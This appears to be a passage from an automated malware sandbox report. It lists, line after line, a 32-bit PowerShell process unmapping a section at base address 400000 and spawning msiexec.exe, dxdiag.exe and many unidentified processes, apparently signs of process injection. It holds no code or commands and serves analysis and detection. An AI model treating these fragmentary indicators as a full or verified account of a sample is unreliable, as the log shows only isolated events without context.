Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section unmapped: unknown base address: 400000	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: unknown unknown	Jump to behavior
